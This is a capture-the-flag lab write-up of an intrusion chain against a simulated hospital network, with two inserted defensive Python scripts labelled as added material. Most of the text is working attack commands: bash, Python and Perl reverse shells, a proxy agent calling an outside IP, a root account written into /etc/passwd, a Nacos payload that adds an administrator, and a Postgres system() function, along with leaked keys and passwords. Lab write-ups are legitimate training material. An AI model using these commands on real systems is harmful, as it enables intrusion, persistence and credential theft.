春秋云境 - Hospital

External foothold

Found the web page

dirsearch scan

python3 dirsearch.py -u http://39.99.138.184:8080/

Found a leaked heap dump; download it and dump it

java -jar JDumpSpider-1.1-SNAPSHOT-full.jar heapdump

Found the Shiro key

===========================================
CookieRememberMeManager(ShiroKey)
-------------
algMode = CBC, key = GAYysgMQhG7/CzIJlVpR2g==, algName = AES

Look for a Shiro framework exploitation tool

We can see the shell has low privileges

SUID privilege escalation

find / -perm -u=s -type f 2>/dev/null

Use vim to escalate and read the file; this needs an interactive shell, so first pop a reverse shell to make it easier

bash -c '{echo,YmFzaCAtaSA+JiAvZGV2L3RjcC94eC54eC54eC54eC8xMjM0IDA+JjE=}|{base64,-d}|{bash,-i}'

vim.basic /root/flag/flag01.txt
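From the defender's side, the `find / -perm -u=s` step above is exactly the audit a hardening check should run before an attacker does. The following is an added example, not part of the original writeup: it classifies setuid/setgid binaries and flags the ones that double as editors, pagers, interpreters or shells (vim.basic being the case on this box). The `RISKY_BASENAMES` set is an assumed short list, not a complete catalogue, and `SAMPLE_ENTRIES` is constructed data.

```python
"""Audit setuid/setgid binaries for ones that hand out file access or a shell.

Added example, not from the original writeup. RISKY_BASENAMES is an assumed,
deliberately short list; SAMPLE_ENTRIES is constructed, not from a real host.
"""
import os
import stat

# Assumed: binaries that are dangerous when setuid because they can read or
# write arbitrary files or spawn a shell (editors, pagers, interpreters).
RISKY_BASENAMES = {
    "vim", "vim.basic", "vim.tiny", "vi", "nano", "less", "more",
    "find", "awk", "gawk", "perl", "python", "python3", "bash", "sh",
    "dash", "env", "cp", "tee",
}


def classify(path, mode):
    """Return (path, flags, risky) for a setuid/setgid regular file, else None."""
    if not stat.S_ISREG(mode):
        return None
    flags = []
    if mode & stat.S_ISUID:
        flags.append("setuid")
    if mode & stat.S_ISGID:
        flags.append("setgid")
    if not flags:
        return None
    base = os.path.basename(path)
    # python3.10 -> python, perl5.34 -> perl: strip a trailing version string
    risky = base in RISKY_BASENAMES or base.rstrip("0123456789.") in RISKY_BASENAMES
    return (path, "+".join(flags), risky)


def audit_entries(entries):
    """entries: iterable of (path, st_mode). Risky findings are listed first."""
    hits = [r for r in (classify(p, m) for p, m in entries) if r is not None]
    return sorted(hits, key=lambda r: (not r[2], r[0]))


def audit_tree(root="/"):
    """Walk a real filesystem with lstat so symlinks are never followed."""
    def entries():
        for dirpath, _dirs, files in os.walk(root):
            for name in files:
                path = os.path.join(dirpath, name)
                try:
                    yield path, os.lstat(path).st_mode
                except OSError:  # permission denied, file vanished, etc.
                    continue
    return audit_entries(entries())


# Constructed sample st_mode values (octal), not taken from a real host.
SAMPLE_ENTRIES = [
    ("/usr/bin/vim.basic", 0o104755),  # setuid editor: can read/write any file
    ("/usr/bin/passwd", 0o104755),     # setuid by design
    ("/usr/bin/sudo", 0o104755),       # setuid by design
    ("/usr/bin/ls", 0o100755),         # no special bits
    ("/usr/bin/wall", 0o102755),       # setgid tty, expected
]

if __name__ == "__main__":
    for path, flags, risky in audit_entries(SAMPLE_ENTRIES):
        print(f"{'RISKY ' if risky else '      '}{flags:14} {path}")
```

Run `audit_tree("/")` as root on a real host to get the same report for the whole filesystem; anything flagged risky should lose its setuid bit (`chmod u-s`) unless there is a documented reason for it.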

Upload fscan and run a scan

./fscan -h 172.30.12.0/24

   ___                              _
  / _ \     ___  ___ _ __ __ _  ___| | __
 / /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__|   <
\____/     |___/\___|_|  \__,_|\___|_|\_\
fscan version: 1.8.4
start infoscan
trying RunIcmp2
The current user permissions unable to send icmp packets
start ping
(icmp) Target 172.30.12.5 is alive
(icmp) Target 172.30.12.6 is alive
(icmp) Target 172.30.12.236 is alive
[*] Icmp alive hosts len is: 3
172.30.12.236:8080 open
172.30.12.5:8080 open
172.30.12.6:445 open
172.30.12.6:139 open
172.30.12.6:135 open
172.30.12.236:22 open
172.30.12.5:22 open
172.30.12.6:8848 open
172.30.12.236:8009 open
[*] alive ports len is: 9
start vulscan
[*] NetInfo
[*]172.30.12.6
[->]Server02
[->]172.30.12.6
[*] NetBios 172.30.12.6 WORKGROUP\SERVER02
[*] WebTitle http://172.30.12.5:8080 code:302 len:0 title:None 跳转url: http://172.30.12.5:8080/login;jsessionid=719C12ACB9D4C848919679B06AB55529
[*] WebTitle http://172.30.12.5:8080/login;jsessionid=719C12ACB9D4C848919679B06AB55529 code:200 len:2005 title:医疗管理后台
[*] WebTitle http://172.30.12.236:8080 code:200 len:3964 title:医院后台管理平台
[*] WebTitle http://172.30.12.6:8848 code:404 len:431 title:HTTP Status 404 – Not Found
[+] PocScan http://172.30.12.6:8848 poc-yaml-alibaba-nacos
[+] PocScan http://172.30.12.6:8848 poc-yaml-alibaba-nacos-v1-auth-bypass
[+] PocScan http://172.30.12.5:8080 poc-yaml-spring-actuator-heapdump-file

The current privileges are too low, so here we write a public key to escalate to root privileges

vim.basic /etc/passwd
i
hacker:$1$123$7mft0jKnzzvAdU4t0unTG1:0:0:/root:/bin/bash # creates the user hacker/123456
wq!
su hacker

The scan shows the internal host is running Nacos, so the SnakeYaml exploit applies; change the command executed in AwesomeScriptEngineFactory.java to add an administrator user

https://github.com/charonlight/NacosExploitGUI

Runtime.getRuntime().exec("net user calmsec qwer1234! /add");
Runtime.getRuntime().exec("net localgroup administrators calmsec /add");

javac src/artsploit/AwesomeScriptEngineFactory.java
jar -cvf yaml-payload.jar -C src/ .

Then upload the compiled jar to the tmp directory of the compromised machine, set up a proxy on the compromised machine (make sure it runs in the background), and start a Python HTTP server so that 16 on the internal network can fetch the jar from 15

nohup ./linux_x64_agent -c 1.92.148.33:61032 -s aab32 &

Start a service on port 80 on the compromised machine

If it succeeds, you can RDP straight in

Next, look at port 8080 on .236 and capture the traffic with Burp

fastjson exploitation

Found JSON, guessed fastjson, and tested it

Got flag3

Continue using the plugin to inject a webshell

Connect with Godzilla

Found the .54 subnet

Reverse shell back to the entry machine

python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("172.30.12.5",7777));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("sh")'

Set up the proxy again and upload fscan

./fscan -h 172.30.54.179/24

   ___                              _
  / _ \     ___  ___ _ __ __ _  ___| | __
 / /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__|   <
\____/     |___/\___|_|  \__,_|\___|_|\_\
                     fscan version: 1.8.3
start infoscan
(icmp) Target 172.30.54.179   is alive
(icmp) Target 172.30.54.12    is alive
[*] Icmp alive hosts len is: 2
172.30.54.179:8080 open
172.30.54.12:22 open
172.30.54.179:22 open
172.30.54.12:5432 open
172.30.54.12:3000 open
172.30.54.179:8009 open
[*] alive ports len is: 6
start vulscan
[*] WebTitle http://172.30.54.12:3000  code:302 len:29     title:None 跳转url: http://172.30.54.12:3000/login
[*] WebTitle http://172.30.54.179:8080 code:200 len:3964   title:医院后台管理平台
[*] WebTitle http://172.30.54.12:3000/login code:200 len:27909  title:Grafana
已完成 4/6 [-] ssh 172.30.54.179:22 root root@111 ssh: handshake failed: ssh: un
已完成 4/6 [-] ssh 172.30.54.179:22 root 1qaz2wsx ssh: handshake failed: ssh: un
已完成 4/6 [-] ssh 172.30.54.12:22 root 1qaz!QAZ ssh: handshake failed: ssh: una
已完成 4/6 [-] ssh 172.30.54.179:22 admin admin123 ssh: handshake failed: ssh: u
已完成 4/6 [-] ssh 172.30.54.179:22 admin 1234567890 ssh: handshake failed: ssh:
已完成 4/6 [-] ssh 172.30.54.179:22 admin 1q2w3e ssh: handshake failed: ssh: una
已完成 6/6
[*] 扫描结束,耗时: 6m48.2826514s
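Both fscan runs in this writeup (the 172.30.12.0/24 scan earlier and the 172.30.54.0/24 scan just above) produce the same line formats: `(icmp) Target ... is alive`, `ip:port open`, `[*] WebTitle`, `[*] NetBios` and `[+] PocScan`. When a scan like this turns up in a blue-team investigation (left behind on a compromised host, or captured from an attacker's tooling), the first job is to turn it into an asset inventory and a list of hosts that had PoC hits. The following is an added example, not part of the writeup or of fscan itself; `SAMPLE_FSCAN` is constructed from lines of the same shape as the output above.

```python
"""Parse fscan text output into a per-host inventory.

Added example, not from the original writeup and not fscan's own code.
SAMPLE_FSCAN is constructed from lines shaped like the scans above.
"""
import re
from collections import defaultdict
from urllib.parse import urlsplit

RE_ALIVE = re.compile(r"^\(icmp\) Target (\S+)\s+is alive")
RE_PORT = re.compile(r"^(\d{1,3}(?:\.\d{1,3}){3}):(\d+) open$")
RE_WEB = re.compile(r"^\[\*\] WebTitle (\S+)\s+code:(\d+)\s+len:(\d+)\s+title:(.*)$")
RE_POC = re.compile(r"^\[\+\] PocScan (\S+)\s+(\S+)")
RE_NETBIOS = re.compile(r"^\[\*\] NetBios (\S+)\s+(.*)$")


def _new_host():
    return {"alive": False, "ports": set(), "web": [], "pocs": [], "netbios": None}


def parse_fscan(text):
    """Return (inventory, unparsed_lines); inventory maps ip -> host record."""
    inventory = defaultdict(_new_host)
    unparsed = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if m := RE_ALIVE.match(line):
            inventory[m.group(1)]["alive"] = True
        elif m := RE_PORT.match(line):
            inventory[m.group(1)]["ports"].add(int(m.group(2)))
        elif m := RE_WEB.match(line):
            host = urlsplit(m.group(1)).hostname
            inventory[host]["web"].append({
                "url": m.group(1), "code": int(m.group(2)),
                "len": int(m.group(3)), "title": m.group(4).strip(),
            })
        elif m := RE_POC.match(line):
            host = urlsplit(m.group(1)).hostname
            inventory[host]["pocs"].append(m.group(2))
        elif m := RE_NETBIOS.match(line):
            inventory[m.group(1)]["netbios"] = m.group(2).strip()
        else:
            unparsed.append(line)  # banners, progress lines, brute-force noise
    return dict(inventory), unparsed


def hosts_needing_attention(inventory):
    """Hosts with at least one PoC hit, sorted by ip, with their PoC names."""
    return sorted((ip, rec["pocs"]) for ip, rec in inventory.items() if rec["pocs"])


# Constructed sample in the same format as the scans above.
SAMPLE_FSCAN = """\
(icmp) Target 172.30.12.5 is alive
(icmp) Target 172.30.12.6 is alive
172.30.12.5:8080 open
172.30.12.6:8848 open
172.30.12.6:445 open
[*] NetBios 172.30.12.6 WORKGROUP\\SERVER02
[*] WebTitle http://172.30.12.5:8080 code:302 len:0 title:None 跳转url: http://172.30.12.5:8080/login
[*] WebTitle http://172.30.12.6:8848 code:404 len:431 title:HTTP Status 404 – Not Found
[+] PocScan http://172.30.12.6:8848 poc-yaml-alibaba-nacos
[+] PocScan http://172.30.12.6:8848 poc-yaml-alibaba-nacos-v1-auth-bypass
[+] PocScan http://172.30.12.5:8080 poc-yaml-spring-actuator-heapdump-file
已完成 6/6
"""

if __name__ == "__main__":
    inv, rest = parse_fscan(SAMPLE_FSCAN)
    for ip, rec in sorted(inv.items()):
        print(ip, sorted(rec["ports"]), rec["netbios"] or "", rec["pocs"])
    print("unparsed:", rest)
```

The two PoC names that matter for this range (the Nacos auth bypass and the exposed Spring Actuator heapdump) fall straight out of `hosts_needing_attention`; each is a configuration fix (authentication on Nacos, `management.endpoints.web.exposure.include` restricted so `heapdump` is not public) rather than a patch.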

Use https://github.com/A-D-Team/grafanaExp: download the Linux build and upload it to the compromised machine

Target vulnerable has plugin [alertlist]
Got secret_key [SW2YcwTIb9zpOOhoPsMm]
There is [0] records in db.
type:[postgres]
name:[PostgreSQL]
url:[localhost:5432]
user:[postgres] password[Postgres@123]
database:[postgres] basic_auth_user:[] basic_auth_password:[]
All Done, have nice day!

Database privilege escalation

The scan found the database, so connect to it

First change the root password

ALTER USER root WITH PASSWORD '123456';

Now, in the shell popped from Godzilla, listen on port 4444 again

Reverse shell: psql can also create a function that executes commands; the drawback is that there is no output

CREATE OR REPLACE FUNCTION system (cstring) RETURNS integer AS '/lib/x86_64-linux-gnu/libc.so.6', 'system' LANGUAGE 'c' STRICT;
select system('curl 172.30.54.179');

select system('perl -e \'use Socket;$i="172.30.54.179";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};\'');

References:
https://tttang.com/archive/1547/#toc_0x06-postgresql
https://blog.csdn.net/qq_33020901/article/details/79032774

Get an interactive shell

python3 -c 'import pty;pty.spawn("/bin/bash")'

Connect directly, type ? and then !/bin/bash to get root privileges, then read the flag file directly

flag{be4c267d-e3be-482f-b03b-45bade888421}